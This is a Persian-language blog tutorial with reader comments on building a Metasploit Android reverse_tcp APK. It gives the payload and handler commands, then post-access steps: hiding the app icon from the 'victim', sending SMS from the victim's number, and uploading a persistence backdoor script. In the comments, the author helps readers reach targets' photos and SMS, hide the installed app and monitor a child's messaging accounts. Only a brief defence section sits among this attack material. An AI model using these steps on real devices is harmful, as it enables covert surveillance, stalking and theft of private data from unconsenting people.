هک اندروید با استفاده از کالی لینوکس و راه های امنیت

هک اندروید

در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس می پردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با ما همراه باشید.

هک اندروید و امنیت

توضیحات درباره هک اندروید

سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

متاسپلویت

متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم ؛ اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد،
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم.
 

اموزش ویدیو ای هک اندروید و امنیت 

 
  

اموزش تست نفوذ اندروید

در ابتدا با دستور زیر وارد متاسپلویت شوید

msfconsole

بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید

use android/meterpreter/reverse_tcp

حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید، دقت داشته باشید در این بخش باید ای پی سرور خود را وارد کنید در صورتی که از سرور استفاده نمی کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده است.

set LHOST 127.0.0.1

و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت 6060 را استفاده میکنیم

set LPORT 6060

حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید

generate -f raw -o PentestCore.apk

دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید

use multi/handler

و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم

set PAYLOAD android/meterpreter/reverse_tcp

مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

نحوه استفاده از meterpreter بعد از نفوذ

استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :

  معرفی اسکریپت پاورشل برای تست نفوذ

دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .

دستور اول : hide_app_icon

با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.

دستور دوم : check_root

با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟
تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.

دستور سوم : send_sms -d number -t ” body text sms ”

دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور
با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.

نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter  کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.

ایجاد بکدور بر روی اندروید قربانی

در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :

/ cd

سپس در این مرحله باید با استفاده از دستور زیر به  مسیر sdcard وارد شوید :

cd /sdcard

سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.

upload /root/Desktop/backdoor.sh /sdcard

دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.

  دانلود از یوتیوب با موبایل از طریق ترموکس

در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .

سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :

/ cd

cd /sdcard

در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :

sh lifetime.sh

در نهایت باید با استفاده از دستور reboot  یک بار سیستم عامل اندروید قربانی را reboot  کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.

آموزش امنیت و جلوگیری از هک اندروید

  • برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :
  • از انتی ویروس های اورجینال اندرویدی استفاده کنید
  • از نصب برنامه های نامعتبر و کرک شده خود داری کنید
  • با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
  • از دریافت برنامه به غیر از پلی استور خود داری کنید
  • بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
  • از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
  • دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
  • پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
هک اندروید با استفاده از کالی لینوکس و راه های امنیت

دانلود ویدیو اموزشی



 
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد 
پایدار باشید.

5/5 (2 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور ، مدرس دوره های تست نفوذ و امنیت

مطالب مرتبط

۱۷۵ دیدگاه در “هک اندروید با استفاده از کالی لینوکس و راه های امنیت”

  • abbaspor900103 سپتامبر 16, 2018 پاسخ

    چطور با این برنامه به عکس و فیلم های شخص دسترسی داشته باشیم

    • Nima Nani سپتامبر 16, 2018 پاسخ

      بعد از گرفتن دسترسی میتوانید دستورات خود را اجرا کنید و هر کاری که نیاز دارید انجام بدین

  • MAJID نوامبر 24, 2018 پاسخ

    عالیه

  • Gomnambash31252 نوامبر 29, 2018 پاسخ

    ای پی که میگه منظورش چیه دقیقن؟
    و به جا ای پی میشه بهش ادرس ایمیل یا تلگرام بدم که اطلاعاتش واسم بیاد؟!

    • Nima Nani نوامبر 29, 2018 پاسخ

      این اموزش برای ساخت پلود Apk است و تست نفوذ با استفاده از فایل Apk میباشد
      در بخش ای پی یا ip باید ip سرور برای اتصال کلاینت را وارد کنید

  • آلان نوامبر 30, 2018 پاسخ

    سلام ببخشید من مودمم dlink DWM سیمکارت خور فلاشی هستش ولی زمانی که ایف کانفیگ رو برای \یدا کردن ایبی خودم میزنم در قسمت اول هیچ ایبی ندارم .وقتی هم تو ایرنترنت برس و جو کردم گفتند باید بورت فرواردینگ رو درست کنم و اینا ولی بازم به چیزی نرسیدم و نتوستم از متاسبلویت استفاده کنم اگه میشه راهنمایی کنید ممنون

    • Nima Nani دسامبر 1, 2018 پاسخ

      بهتر است برای تست نفوذ از سرور های مجازی کالی لینوکس استفاده نمایید که امنیت بیشتری داشته باشید و نیازی به پورت فورواردینگ نداشته باشید
      در صورتی که میخواهید از طریق سیستم خود انجام دهید در بخش جستجو پورت فورواردینگ را جستجو نمایید و اموزش مورد نظر را مشاهده کنید

  • amirtaylord84 دسامبر 13, 2018 پاسخ

    سلام خسته نباشید
    خوب ما بخوایم مثلا به یه گوشی متصل شیم اونوقت باید چجوری به اون گوشی که مده نظرمونه متصل شیم یعنی بدون اینکه گوشی دسته ما باشه میشه اینکارو کرد؟

    • Nima Nani دسامبر 14, 2018 پاسخ

      درود تشکر
      باید فایل apk که ساخته اید را به هر طریقی در سیستم اندرویدی که میخواهید دسترسی داشته باشید نصب نمایید

  • witchhunter416 دسامبر 24, 2018 پاسخ

    اقا من بخام به اسم ام اس هاش دسترسی پیدا کنم باید چیکار کنم؟
    بعدش که اونو اجرا کرد
    چجوری بهش دسترسی پیدا کنم؟
    اس ام اسو میگم

    • Nima Nani دسامبر 25, 2018 پاسخ

      درود
      با زدن help میتوانید نحوه استفاده از متاسپلویت را مشاهده کنید درصورت امکان اموزشی جداگانه برای نحوه کارکرد متاسپلویت قرار خواهیم داد موفق باشید

  • witchhunter416 دسامبر 27, 2018 پاسخ

    سلام
    ای پی که باید بزنیمو از کجا بدونیم چیه

    • Nima Nani دسامبر 28, 2018 پاسخ

      درود
      از سرور مجازی استفاده کنید هنگام خرید ای پی به شما داده میشود و یا میتوانید ای پی خود را با دستور ifconfig مشاهده نمایید

  • علی موسوی دسامبر 27, 2018 پاسخ

    ببخشید من با vmware
    داخل لینوکس شدم رمشم بالای یک گیگ گزاشتم بازم هنگ میکنه چیکار کنم؟

    • Nima Nani دسامبر 28, 2018 پاسخ

      مقدار cpu اختصاص داده شده را بالا ببرید و مقدار رم را در سیستم عادلانه تقسیم کنید و بیشتر از منابع واقعی سیستم نزارید

  • witchhunter416 دسامبر 27, 2018 پاسخ

    من با cmd دستور ipconfig زدم دو تا ایپی زده بود یکی مال سیستم یکی مال vmware کدومو باید بزنم
    بعد این ایپی هارو باید توی مودم هم port forwarding کنم یا نیازی نیس ؟

    • Nima Nani دسامبر 28, 2018 پاسخ

      از داخل کالی لینوکس ifconfig بزنید و ای پی خود را مشاهده کنید اموزش پورت فورواردینگ هم در سایت جستجو نمایید و مشاهده کنید

  • witchhunter416 ژانویه 1, 2019 پاسخ

    با سلام و خسته نباشید
    میخاستم بگم که من همه کار هارو انجام دادم برنامرم رو نصب کردم و اجرا کردم
    ولی توی ترمینال چیزی نمیاد فقط مینویسه که
    started revers tcp handler on 192.168.28.131:3030
    چیکار کنم؟؟؟

    • Nima Nani ژانویه 2, 2019 پاسخ

      درود و تشکر
      شما مشکل در شبکه خود دارید درصورتی که از مجازی ساز ها استفاده میکنید network را بر روی NAT بگذارید و ای پی خود را درست وارد کنید و دقت داشته باشید دستگاه اندروید به شبکه داخلی یا خارجی شما متصل باشد

  • witchhunter416 ژانویه 2, 2019 پاسخ

    ببخشید ولی شبکه داخلی یا خارجی یعنی ب مودم من وصل باشه؟

    • Nima Nani ژانویه 3, 2019 پاسخ

      شبکه داخلی زمانی است که مودم شما یک شبکه NAT ایجاد کرده باشد و شما در داخل یک شبکه خانگی قرار دارید و فقط میتوانید ارتباط بین دستگاه های متصل به ان شبکه برقرار کنید
      شبکه خارجی شبکه بیرونی اینترنت است که هر زمان به اینترنت وصل باشید میتوانید به دستگاه متصل شوید و ازتباط از طریق شبکه جهانی اینترنت برقرار است

  • علی فوریه 4, 2019 پاسخ

    سلام ببخشید من برنامه رو ساختم ولی مجبور شدم از ترمینال خارج بشم و سیستم رو خاموش کنم الان که روشن کردم هر چی میزنم exploit چیزی نمیاد لطفا راهنماییم کنید خیلی مهمه.اگه میشه بفرستید به ایمیلم جواب مشکل رو

    • Nima Nani فوریه 5, 2019 پاسخ

      درود
      در شبکه داخلی شما با خاموش و رشن شدن سیستم ممکن است ای پی ها در هر دستگاه تغیر کند و برای ثابت بودن کلاینت باید از no ip یا سرور مجازی استفاده نمایید که اموزش ها در سایت موجود است

  • Alishh فوریه 9, 2019 پاسخ

    دوتا مشکل دارم
    اولیش: برای ثابت بودن ایپی ، چطور میشه از noip در متاسپلویت استفاده کرد؟ ( نحوه استفاده اش برای رات های اماده رو بلدم ولی برای متاسپلویت نه، اگه میتونی ی اموزش کوتاه براش بذار)
    دومیش:برای هک در ماشین مجازی،بعد از port forwarding حتما باید فایروال سیستم هم غیرفعال بشه؟ اگه اره، تو کالی لینوکس چطور باید این کار رو کرد؟؟؟

    • Nima Nani فوریه 12, 2019 پاسخ

      درود
      اموزش no ip در سایت قرار دارد و در صورت امکان برای متاسپلویت هم قرار خواهد گرفت

  • mehdi ghorbani فوریه 14, 2019 پاسخ

    سلام
    لطفا به من بگید چجوری پیلود رو transportکنم رو برنامه ی سیستمی؟؟؟؟

    • Nima Nani فوریه 22, 2019 پاسخ

      درود
      این موضوع مبحث جداگانه ای دارد که بزودی اموزش ان قرار میگیرد و با دنبال کردن اموزش های PentestCore میتوانید از ان مطلع شوید

  • irancell57 فوریه 15, 2019 پاسخ

    در صورت خارج شدن دوباره چجوری میتونیم به این قسمت دسترسی داشته باشیم

    • Nima Nani فوریه 15, 2019 پاسخ

      درود
      با هر بار وارد شدن به حساب کاربری خود میتوانید به این اموزش دسترسی داشته باشید

  • irancell57 فوریه 15, 2019 پاسخ

    من دسترسی گرفتم لطفا دستورات عملی دسترسی به همه ی نقاط اندروید رو هم بذارید ممنون میشم

    • Nima Nani فوریه 16, 2019 پاسخ

      درود
      مستوانید سویچ های راهنمارا مشاهده کنید
      بزودی اموزشی برای نحوه کنترل اندروید با این روش را قرار میدهیم

  • TheFugitive14 فوریه 19, 2019 پاسخ

    سلام
    من این ارور هارو دارم لطفا راهنماییم کنید
    [-] Handler failed to bind to 192.168.1.103:443:- –
    [-] Handler failed to bind to 0.0.0.0:443:- –
    [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).

    • Nima Nani فوریه 22, 2019 پاسخ

      درود
      مشکلی در تنظیمات وجود دارد مجدد طبق اموزش پیش بروید

  • Moelkurd09 فوریه 20, 2019 پاسخ

    سلام . من دستور generate -t raw -f ex.apk رو میزنم
    بجای ساخت برنامه برام آپشن ها و توضیحات سویچر هارو میاره که t جزشون نیس
    باید سویچ دیگه ای رو بزنم؟
    ا

    • Nima Nani فوریه 22, 2019 پاسخ

      درود
      دستورات را کپی نکنید دستی وارد کنید بدون مشکل اجرا میشوند
      احتمالا مشکل شما به دلیل کپی کردن دستورات بئده است

  • Masuodxavi92 فوریه 22, 2019 پاسخ

    سلام شما برای دستیابی به تلگرام واینیستاگرام فرزندمون چه چیزیو پیشنهاد میکنید چه دوره ای رو

    • Nima Nani فوریه 24, 2019 پاسخ

      درود
      در دوره اموزشی کالی لینوکس روش های کنترل موبایل به صورت کامل گفته شده میتوانید از ان استفاده کنید
      برای مشاهده دوره های اموزشی از منو به بخش دوره ها مراجعه کنید

  • علیرضا ارشد فوریه 27, 2019 پاسخ

    سلام اقا من میخوام اموزش ببینم و بینهایت علاقه دارم و هیچکسو نمیشناسم اموزشم بده فقط تو سایت ها خوندم و رو گوشی تبلتم لینوکس دیپلوی رو نصب کردم همین دگه کاری بلد نیستم

    • Nima Nani مارس 1, 2019 پاسخ

      درود
      شما میتوانید در دوره های اموزشی ما شرکت کنید و از مباحث پایه تا پیشرفته اموزش ببینید

  • seyed136836 مارس 6, 2019 پاسخ

    سلام من دستورت رو دستی وارد میکنم در نهایت فایل رو نمیسازه
    و اپشن ها رو توضیح میده و سویچ t-بینشون نیست
    و تو دستور f- ..ا پی کی رو نوشته ساپورت نمیکنه هر چیزی هم که در توضیحاتش بود فایلشو نساخت
    اخرین نسخه کاای ۱.۲۰۱۹
    متااسپلویت ورژن ۵.۰.۲هم هست
    ممنون
    و تشکر
    و سپاس بخاطر اموزشهاتون و وقتی که برای ما گذاشتید

    • Nima Nani مارس 14, 2019 پاسخ

      درود
      در نسخه جدید یعنی ورژن ۵ متاسپلویت کمی بعضی از سویچ ها تغیر کرده اند
      برای انجام تست نفوذ از روش این اموزش باید از نسخه های قبل از ۵ استفاده کنید
      بزودی اموزش های دیگری با استفاده از متاسپلویت ۵ قرار خواهیم داد
      موفق باشید

  • jmd50 مارس 6, 2019 پاسخ

    سلام وقتتون بخیر بنده exploit رو که میزنم و بعد اون هدفم اپلیکیشن رو نصب میکنه ولی بعد از چند ثانیه دستور died میده و باید دوباره من exploit کنم و هدفم هم دوباره رو اپ کلیک کنه تا من دوباره دسترسی داشته باشم به گوشیش برای اینکه این اتفاق نیافته باید چکار کنم ممنون میشم راهنمایی کنید

    • Nima Nani مارس 10, 2019 پاسخ

      درود
      بله در بعضی از دستگاه ها ممکن است مشکلات به این صورت به وجود اید میتوانید پبلود های دیگر اندروید را در دستگاه مورد نظر تست کنید یا از رات ها استفاده کنید که اموزش های ان ها در سایت موجود است و با جستجو میتوانید مشاهده کنید

  • mohammadfeizy777827 مارس 13, 2019 پاسخ

    سلام من روی وی ام کالی دارم با اون بسازم میتونم ای پی وی پی اس مو ک ویندوز سرور روش نصبه رو بدم بعد چجوری از روی وی پی اس وصل شم ؟ یا کلا متااسپلویت رو روی ویندوز سرور روی وی پی اس نصب کنم همونجا بسازم؟

    • Nima Nani مارس 14, 2019 پاسخ

      درود
      بله باید ای پی سرور کجازیتونو بدید و از داخل سرور مجازی ان را کنترل کنید
      بهتره از سرور مجازی کالی لینوکس استفاده کنید اما میتوانید در ویندوز هم متاسپلویت را نصب کنید و این کار را انجام دهید
      برای تهیه سرور مجازی به سایت اول سرور مراجعه کنید
      موفق باشید

  • علی عباسی مارس 17, 2019 پاسخ

    سلام ببخشید من پیلود که درست میکنم فقط روی همون دستگاهی که باهاش ساختم نصب کنم کار میکنه روی مبایل دیگم نصب کردم هرچی کلیک میکنه روی ویروس هیچ اتفاقی داخل مولتی هندلر نمی افته انگار کسی روش کلیک نکرده مشکل چیه

    • Nima Nani مارس 19, 2019 پاسخ

      درود احتمالا مشکل از شبکه و ip داخلی شما است باید از ای پی ثابت استفاده کنید که چند راه وجود دارد ۱- از پورت فورواردینگ و no ip استفاده کنید ۲- سرور مجازی تهیه کنید و به صورت امن و بدون دردسر از این روش استفاده کنید

  • عباس سعید۶ مارس 18, 2019 پاسخ

    سلام لطفا یه اموزش بزارید که ازvps چطور استفاده کنیم وقتی داخل متا اکسپلویت میکنم روی vps بایند نمیشه فقط ایپی خودشو قبول میکنه

    • Nima Nani مارس 19, 2019 پاسخ

      درود
      اگر سرور مجازی کالی لینوکس تهیه کرده باشید با همین دستورات میتوانید به راحتی apk را بسازید فقط کافیست در هنگام ست کردن ip , ip سرور خود را بدهید

  • علی رصا مارس 21, 2019 پاسخ

    سلام ببخشید این پورت فورواردینگ که با سایتserveo.net روی مبایل انجام میدن امن هست یا این ردیابی میشه

    • Nima Nani مارس 31, 2019 پاسخ

      درود
      سایت های زیادی برای این کار هستند اما به صورت کلی روش پورت فورواردینگ با استفاده از این وبسایت ها ،به راحتی ای پی اصلی شما را در اختیار میگذارد

  • sali14 مارس 25, 2019 پاسخ

    باسلام
    من یک چیزی را متوجه نشدم
    الان من در ویندوز لپ تاپم Vmware نصب کردم و روی اون Vmware کالی لینوکس نصب کردم
    حالا برای قضیه ip ثابت باید دقیقا چیکار کنم؟
    اینکه سرور مجازی بخرم و همون ip رو در کالی(که روی Vmهست) بجای ip وارد کنم کافیه؟
    یا باید پورت فورواردینگ هم بکنم؟ (اگه اره چجوری ؟؟؟)
    یا باید کلا کالی رو جای دیگه ای نصب کنم؟؟
    لطفا کامل و به زبان ساده بگید من مبتدی هستم 🙂
    ممنون

    • Nima Nani مارس 28, 2019 پاسخ

      درود
      در صورت تهیه سرور مجازی داخل همان سرور باید تمامی کار ها را انجام دهید و از داخل همان ، دستگاه مورد نظر را کنترل نمایید
      اگر میخواهید در مجازی ساز سیستم خانگی خود اینکار را انجام دهید اموزش پورت فورواردینگ و noip را در سایت جستجو و مشاهده کنید

  • اون آوریل 1, 2019 پاسخ

    سلام بعد از دستور ساخت فایل apk فایل را نمیسازد !

    • Nima Nani آوریل 10, 2019 پاسخ

      درود در نسخه جدید کمی تغیرات ایجاد شده است که در اموزش بزودی اضافه میکنیم یا میتوانید از سویچ help تغیرات را مشاهده کنید
      در صورتی که نتوانستید بسازید میتوانید نسخه قدیمی تر هم استفاده کنید

  • momenimahdi242 آوریل 17, 2019 پاسخ

    ایا میشه بدون سرور کارشو انجام داد؟

    • Nima Nani آوریل 17, 2019 پاسخ

      درود بله اما باید DNS ثابت بگیرید و پورت فورواردینگ انجام دهید

  • hamid آوریل 24, 2019 پاسخ

    سلام وقت بخیر.من یک vm دارم و کالی رو روی ان نصب کردم و با هات اسپات اینترنت گرفتم .exploit که میخواد نصب بشه فقط دو دستور اول میاد و دیگه اتفاقی نمیفته با این حال فایل رو روی گوشی میخواستمنصب کنم نصب نمیشد مشکل کجاست ؟؟؟؟

    • Nima Nani می 10, 2019 پاسخ

      درود
      نسخه های خیلی قدیمی اندروید پشتیبانی نمیشود یا مراحلی از اموزش را به درستی انجام نداده اید مجدد برسی کنید یا ارور را ارسال کنید

  • علی می 12, 2019 پاسخ

    سلام.با پایتون میشه انجام داد?

    • Nima Nani می 25, 2019 پاسخ

      درود
      پایتون یک زبان برنامه نویسی است که در صورتی که بلد باشید میتوانید ابزاری مشابه بنویسید به زبان پایتون و استفاده کنید

  • hojat می 18, 2019 پاسخ

    سلام من دستور generate رو وارد میکنم میره تنظیمات دستور رو میاره

    • Nima Nani می 21, 2019 پاسخ

      درود
      تغیراتی در سویچ های نسخه جدید ایجاد شده است که پست بروز شده و میتوانید مجدد تست کنید

  • Mr scarse ژوئن 23, 2019 پاسخ

    سلام دوست عزیز خسته نباشید، این کد ها در متا نسخه ویندوز اجرا میشن؟

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      بله مشکلی با نسخه ویندوز ندارند

  • مهران ژوئن 28, 2019 پاسخ

    ببخشید داداش من میخوام با ایپی پابلیک دسترسی بگیرم ولی ارور بایند شده رو میده ولی وقتی با اون یکی ایپی میزنم کار میکنه

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      ممکن است اپ را از قبل ساخته باشد و حذف نکرده باشید
      فایل را حذف کنید و با نام جدید ایجاد کنید
      ای پی را هم به صورت دستی وارد نمایید و کپی نکنید
      باز هم مشکلی داشتید ارور را ارسال کنید

  • No Name ژوئن 29, 2019 پاسخ

    سیستم عامل لیتوکس رو مجازی نصب نمیشه کامپیوتر رم و cpu ضغیفی داره اگه به جا ویندوز نصب کنم می تونم هک امنیت انجام بدم ؟؟؟

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      شما میتوانیداز نسخه های کم حجم و سبک تر کالی لینوکس استفاده کنید
      در صورتی هم که جایگزین سیستم عامل اصلی خود کنید مشکلی وجود نخواهد داشت اما باید حداقل منابع مورد نیاز کالی لینوکس را داشته باشید

  • Omid ژوئن 29, 2019 پاسخ

    سلام خسته نباشید
    قسمت ساخت apk مشکل دارم
    همش پیغام failed to load module دریافت میکنم ، ممنون میشم راهنماییم کنید.

    • Nima Nani جولای 11, 2019 پاسخ

      درود و تشکر
      مشکل ممکن است از سمت دیتابیس متاسپلویت شما باشد
      سیستم عامل را اپدیت و ری استارت کنید

  • احمد آراسته جولای 1, 2019 پاسخ

    سلام من چندین بار قبل از آشنایی با سایت شما این کارو بدون مشکل انجام دادم.اما جدیدا هربار امتحان میکنم مشکلی در انتهای کار دارم.
    بعد از اجرا و بعد از خط started reverse TCP …..
    این خط واسم ظاهر نمیشه و کلا کار نمیکنه و اطلاعات واسم ارسال نمیشه
    (این خط نمیاد)starting the payload handler….
    هیچکس نتونسته مشکلم رو حل کنه.شما چیزی در مورد این مشکل میدونید؟

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      احتمالا دستورات را اشتباه وارد میکنید طبق اموزش پیش بروید
      در صورتی که مشکلی وجود داشت ارور خود را ارسال کنید تا دقیق تر بتوانیم راهنمایتان کنیم

  • Venom hacker جولای 7, 2019 پاسخ

    سلام خسته نباشید ایا برای هک تارگت باید حتما توی یک شبکه باشند یا خیر ؟؟
    ممنون از سایت خوبتون

    • Nima Nani جولای 11, 2019 پاسخ

      درود
      خیر در صورتی که خارج از شبکه باشد باید پورت فورواردینگ انجام دهید یا ای پی ثابت به صورت مستقیم داشته باشید

  • abolfazl222 جولای 14, 2019 پاسخ

    با سلام ممنون از اموزش خوبتوتون عالیه فقط من کالی لینکوسو نداشتم رفتم دانلودش کردم و روی فلش مموری بوت ساختم و کالی اونتوس من وقتی میخوام وارد لینکوس بشم یا باید نصبش کنم یا بصورت live برم خب به صورت live راحت نیستم میخوام نصبش کنم نمیشه به یه قسمتی میرسه میگه cd-dvd rom یه همچین چیزی و دو گزینه ی no و yes داره yes رو که میزنم از مرحله جلو تر نمیره و no رو که میزنم بر میگرده به مراحل قبل ممنون میشم کمک کنید

    • Nima Nani آگوست 16, 2019 پاسخ

      درود
      دوست عزیز این سوال مربوط به این اموزش نیست اموزش نصب کالی لینوکس را در سایت جستجو و مشاهده کنید و در صورت مشکل در اموزش مربوطه سوال فرمایید

  • abolfazl222 جولای 15, 2019 پاسخ

    سلام من نمیتونم کالی رو نصب کنم و وقتی کی فایل apk درست میکنم نمیدونم چجوری وارد گوشی کنم و دستوراتی که باید برای گوشی قربانی بدم رو ندارم ممنون میشم کمک کنید

    • Nima Nani آگوست 16, 2019 پاسخ

      درود
      شما چنین سوال کلی را پرسیدید که امکانش نیست در این بخش بتوان توضیح داد اما اموزش های ان ها در سایت قرار دارد با کمی جستجو یتوانید به ان دسترسی پیدا کنید
      موفق باشید

  • Mos آگوست 4, 2019 پاسخ

    سلام خسته نباشید
    من متااسپولیت یا همون اپلیکیشن رو ساختم ولی نمیدونم چه طوری اون رو از داخل کالی لینوکس به گوشی خودم یا شخص مورد نظر ارسال کنم
    اگه راهنماییم کنید ممنون میشم.

    • Nima Nani آگوست 16, 2019 پاسخ

      درود تشکر
      اگر از مجازی ساز استفاده می کنید کافیه ان را کپی کنید و در سیستم عاملی اصلی منتقل کنید اگر هم که به صورت نصبی دارید با فلش استفاده یا در جایی اپلود کنید

  • Mos آگوست 4, 2019 پاسخ

    سلام چه طوری اپلیکیشن یا همون متااسپولیت رو که ساختیم از کالی لینوکس خارجش کنیم یا بفرستیمش به فرد مورد نظر؟
    ممنون میشم کمکم کنید .

  • mostafakn82 آگوست 12, 2019 پاسخ

    سلام خسته نباشید .
    ببخشید آیا ابزار شاخته شده با این روش رو می توان در تلفن همراه تارگت مورد نظر مخفی کرد ؟؟؟
    ممنون .

    • Nima Nani آگوست 16, 2019 پاسخ

      درود و تشکر
      برای این کار اموزش اسپای نوت را در سایت جستجو کنید این ابزار امکان مخفی کردن فایل نصب شده را دارد

  • alijooshideh آگوست 12, 2019 پاسخ

    سلام من برای پورت فرواردینک ای پی لینوکس رو میزنم اما ارور میده

    • Nima Nani آگوست 17, 2019 پاسخ

      درود
      دقیق تر توضیح بدین مشکل را و ارور را ارسال کنید

  • mostafakn82 آگوست 27, 2019 پاسخ

    سلام . خسته نباشید . ممنونم از آموزش کامل شما .
    همه چیز درسته . ولی می خواستم بدونم که آیا غیر از sms ها و Contacts های تارگت . چیز های دیگر رو چه جوری می توان به دست آورد ؟؟

    • Nima Nani اکتبر 17, 2019 پاسخ

      درود و تشکر
      به بخش های زیادی از دستگاه مانند دوربین برنامه ها و … دسترسی پیدا میکنید که سعی میشود در اموزش های بعدی در این رابطه به صورت کامل اموزش قرار داده شود

  • ali سپتامبر 3, 2019 پاسخ

    سلام خسته نباشید. میخواستم بدونم که آیا بعد از این که تارگت فایل apk رو نصب و بعد حذف کنه باز هم به سیستم اندرویدی تارگت دسترسی داریم؟

    یه سوال دیگه هم که داشتم اینه که ایا بعد از نصب برنامه خود به خود ناپدید میشه؟

    • Nima Nani سپتامبر 18, 2019 پاسخ

      درود تشکر از شما دوست عزیز
      با حذف شدن اپ دسترسی شما هم از بین خواهد رفت برای حل مشکل هم میتوانید از بایندر ها استفاده کنید
      در رابطه با سوال دوم خیر اما میتوانید این کار را بر روی اپ اعمال کنید یا
      با اموزش نفوذ به اندروید این کار را با استفاده از رات ها میتوانید انجام دهید

  • محمد اکتبر 3, 2019 پاسخ

    سلام ایا میشه یک برنامه رو مثل گوکل پلی نصب کرد بدون مجوز کاربر

    • Nima Nani اکتبر 18, 2019 پاسخ

      درود
      خیر این امکان وجود ندارد مگر در صورت شخصی سازی و دستگاه باید به صورت روت شده باشد

  • mohsen.12428 اکتبر 24, 2019 پاسخ

    سلام خسته نباشید
